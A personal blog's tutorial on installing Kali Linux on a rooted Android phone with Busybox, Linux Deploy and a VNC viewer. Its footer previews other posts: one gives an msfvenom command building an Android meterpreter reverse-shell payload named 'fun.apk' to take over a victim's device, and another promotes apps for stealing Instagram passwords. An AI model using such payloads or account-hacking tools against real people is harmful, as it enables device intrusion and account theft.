Skip to main content

How to Install Kali Linux on Android .

How to Install Kali Linux on Android .


How To Install Kali Linux On android
Kali Linux is one the best love operating system of white hat hackers, security researchers and pentesters. It offers advanced penetration testing tool and its ease of use means that it should be a part of every security professional’s toolbox
Installing Kali Linux in Android phone is very very easy one you need the following requirements.

Rooted Android Device.
Busybox Installer.
Linux Deploy.
Android VNC Viewer.
4GB Free Space on your External Memory.
High Speed Net Connection

Steps To Install Kali Linux On Android Phone
STEP 1:(Rooting Android Device)
Root your android device with the given tutorial.
STEP 2:(Installing Busybox)
 First we need to install UNIX Scripts into our device using the Busybox Installer app.Download the app from above given link and install it in your tablet linux. Open the app and follow the given steps.

 1.Choose the Busybox Version from the drop down menu.
How To Install Kali Linux On android
2.Tap the install buttom
How To Install Kali Linux On android
3.It will download the scripts to be install.
How To Install Kali Linux On android
4.After installing you will get the success message.
How To Install Kali Linux On android
Now you have successfully installed busybox in your android device.

Note: If the installing fails you need to choose different Busybox versions.

STEP 3:(Configure Linux Deploy)

Linux Deploy is the Official app to Download and install kali linux in android download the app and install it in your android. Now open the app and follow the given steps.

1.Tap the properties icon it will opens the properties screen.
How To Install Kali Linux On android
How To Install Kali Linux On android
2. In properties select the distribution to be install.
How To Install Kali Linux On android
3. Leave some setting to be default and select the desktop environment to GNOME.
How To Install Kali Linux On android
4.Select all the components in Components Menu.
How To Install Kali Linux On android
5. In GUI Settings just interchange the height and width values.
How To Install Kali Linux On android
6. Now select the install button and then OK
How To Install Kali Linux On android
How To Install Kali Linux On android
 7. Now the installation process starts be patient for the installation proccess to complete it takes too much of time to complete and prevent the incoming SMS and Voice Calls or Turn off the SIM and use WIFI to download because intreption of cellular data leads to cancellation of download process.
How To Install Kali Linux On android
8. I cant add the screenshot of completed process because I already did it. Now tap the START button  and tap OK it will mount the linux file
How To Install Kali Linux On android
9. Note the IP address in the top left corner of Linux deploy it changes periodically.
STEP 4:(Configure Android vnc)
Now open the Android VNC Viewer, Enter Nickname and password the default password for Kali Linux ischangeme nd give the IP address copied from Linux deploy for me it is 192.168.1.35 and the port is 5900 and username is android and then color is 24-bit color(4bpp). Finally tap the Connect button you will see the Kali Linux in your android device.

How To Install Kali Linux On android
How To Install Kali Linux On android
How To Install Kali Linux On android
How To Install Kali Linux On android
STEP 5:
To close the Kali Linux, exit from the VNC viewer and then go to Linux Deploy and simply tap the Stop Button and the OK it will close the Mounted Image. You can use the Linux Penetration Testing on your android phone and it is most popular for cyber hacking
How To Install Kali Linux On android
How To Install Kali Linux On android
How To Install Kali Linux On android
So all of above is related to how to install Kali Linux on android phone . Hope you like this. If you have any query then comment below.
Posted by Nagesh ;)

Comments

Popular posts from this blog

HOW TO HACK ANDROID USING KALI LINUX 2017 (METASPLOIT)

Getting an access of victim devices (Computer, Android based Phone) is very easy because of reverse exploitation ttacks. A hacker use different types of exploitation’s to gaining access like reverse_tcp, reverse_http and many more with various types of file format (.exe .bat .apk). A payload which is created using reverse_tcp, When victim download that file and install it then it created a reverse connection victim to attacker. There is may be the victim having firewall or some other defense system, In this attack the firewall looks that the client (victim) to send request to the server (attacker machine) that’s why it allow the connection. In this tutorial, I am going to show how we can create a android payload and by using that how can we gaining access of victim device. Open terminal: msfvenom -p android/meterpreter/reverse_tcp set lhost=192.168.0.100 -o fun.apk Where LHOST is the listening host (In my case this is my private IP as per my lab environment), You can ...

Top 10 Free Instagram Hacker App For iPhone and Android.

Top 10 Free Instagram Hacker App For iPhone and Android Posted by Nagesh ;) Instagram is no doubt one of the most used apps when it comes to uploading and sharing pictures with your friends and families. However, as much as you may like to use Instagram, the fact remains that anyone can access your account with or without your consent. How is this possible you may ask? The answer lies in the Instagram hacker app. Yes!! You heard right. An Instagram hacker app is a type of an app that works by retrieving passwords and other login details from a target account. As it stands, since Instagram is available on both the Android and iOS platforms, these apps can be found on this platforms as well. These Instagram hack apps are efficient when it comes to hacking passwords, so it's best to be guaranteed that they will hack your IG account in a matter of minutes. Part 1: 5 Free Instagram Hacker App For iPhone Part 2: 5 Free Instagram Hacker App For Android Part 3: Using ...

Block or Redirect Unwanted Websites Using HOSTS File.

The  hosts file  is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the  hosts  file to block  annoying ads, pop-ups, banners, porn sites, or even redirect one website to another. In this post I will show you how to play around with the  hosts  file to accomplish some of the above mentioned jobs. What is a hosts File? The  hosts  file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses. In other words, when you type “google.com” on your browser’s address bar, your computer will look for the  hosts  file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the  hosts  file, the request is then passed on to the DN...